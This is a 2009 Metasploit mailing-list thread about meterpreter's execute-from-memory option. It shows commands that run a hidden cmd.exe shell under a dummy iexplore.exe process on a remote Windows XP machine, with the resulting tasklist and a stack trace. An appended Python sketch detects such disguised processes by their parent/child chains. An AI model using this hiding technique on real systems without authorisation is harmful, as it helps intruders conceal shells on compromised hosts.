Metasploit mailing list archives
meterpreter execute from memory
From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100
Ok, clear enough... -f local_EXE_file

meterpreter > execute -f cmd.exe -H -i -m -d c:\\progra~1\\intern~1\\iexplore.exe
Process 176 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
System                         4 Console                 0        212 K
smss.exe                     328 Console                 0        372 K
csrss.exe                    584 Console                 0      3,328 K
winlogon.exe                 608 Console                 0      5,096 K
services.exe                 652 Console                 0      3,644 K
savedump.exe                 664 Console                 0      2,388 K
lsass.exe                    672 Console                 0      1,308 K
svchost.exe                  824 Console                 0      4,284 K
svchost.exe                  892 Console                 0      3,728 K
svchost.exe                  988 Console                 0     15,736 K
svchost.exe                 1048 Console                 0      2,844 K
svchost.exe                 1200 Console                 0      4,184 K
explorer.exe                1400 Console                 0     16,448 K
spoolsv.exe                 1540 Console                 0      4,064 K
VBoxTray.exe                1640 Console                 0      1,896 K
VBoxService.exe             1972 Console                 0      1,260 K
wscntfy.exe                  492 Console                 0      1,736 K
alg.exe                      832 Console                 0      3,144 K
wuauclt.exe                 1444 Console                 0      6,232 K
met-rev.exe                 1668 Console                 0      3,084 K
procexp.exe                 1580 Console                 0      6,604 K
wmiprvse.exe                1936 Console                 0      5,588 K
IEXPLORE.EXE                 176 Console                 0      1,516 K
tasklist.exe                2036 Console                 0      3,964 K

C:\Documents and Settings\admin\Desktop>

On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:
Hi,

I don't understand the parameters of execute command (-d -m)

This works perfect:

meterpreter > execute -f cmd.exe -H -i
Process 1220 created.
Channel 33 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>

but when does it make sense to use -d and -m parameters? Can anyone send an example?

meterpreter > execute -h
Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -m        Execute from memory.
    -t        Execute process with currently impersonated thread token

I get this error:

meterpreter > execute -f cmd.exe -H -i -d calc.exe -m
[-] Error running command execute: No such file or directory - cmd.exe
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `initialize'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `new'
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in `execute'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in `cmd_execute'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `call'
/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in `run'
/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/home/user/metasploit/lib/rex/ui/interactive.rb:48:in `interact'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in `cmd_sessions'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
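
Added example, not part of the original messages: in the session above the shell is listed under the dummy image name (IEXPLORE.EXE, PID 176), so a name-based process list does not show cmd.exe, but the process tree still does. The sketch below checks process-creation records for a GUI program that starts console tools or that was started by an unusual launcher. The record format, the three name sets, the file paths other than the iexplore.exe one, and PIDs 1380, 2100, 2200 and 2204 are assumptions constructed for illustration.

```python
import ntpath
from typing import NamedTuple

class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str  # full image path as reported by the OS

# Assumptions, tune per environment: GUI programs that do not normally start
# console tools, the tools worth alerting on, and the usual launchers of GUI programs.
GUI_ONLY = {"iexplore.exe", "calc.exe"}
CONSOLE_TOOLS = {"cmd.exe", "tasklist.exe", "ipconfig.exe", "net.exe"}
EXPECTED_LAUNCHERS = {"explorer.exe", "iexplore.exe"}

def base(path: str) -> str:
    """Lower-cased file name of a Windows path (8.3 short paths included)."""
    return ntpath.basename(path).lower()

def find_suspicious(events):
    """Return (pid, rule, detail) for each event that breaks a parent/child rule.

    Events must be in creation order; a later event reusing a PID replaces the old one.
    """
    by_pid, alerts = {}, []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        by_pid[ev.pid] = ev
        if parent is None:          # parent started before logging began
            continue
        p, c = base(parent.image), base(ev.image)
        if p in GUI_ONLY and c in CONSOLE_TOOLS:
            alerts.append((ev.pid, "console-child", f"{p} -> {c}"))
        elif c in GUI_ONLY and p not in EXPECTED_LAUNCHERS:
            alerts.append((ev.pid, "odd-launcher", f"{p} -> {c}"))
    return alerts

# Constructed sample, reusing PIDs and image names from the tasklist output above.
SAMPLE_EVENTS = [
    ProcEvent(1400, 1380, r"C:\WINDOWS\explorer.exe"),
    ProcEvent(1668, 1400, r"C:\met-rev.exe"),
    ProcEvent(176, 1668, r"c:\progra~1\intern~1\iexplore.exe"),
    ProcEvent(2036, 176, r"C:\WINDOWS\system32\tasklist.exe"),
    ProcEvent(2100, 1400, r"C:\Program Files\Internet Explorer\iexplore.exe"),
    ProcEvent(2200, 1400, r"C:\WINDOWS\system32\cmd.exe"),
    ProcEvent(2204, 2200, r"C:\WINDOWS\system32\tasklist.exe"),
]

if __name__ == "__main__":
    for pid, rule, detail in find_suspicious(SAMPLE_EVENTS):
        print(pid, rule, detail)
```

Only PIDs 176 and 2036 are reported; the browser started from explorer.exe and the tasklist.exe run from a real cmd.exe pass both rules.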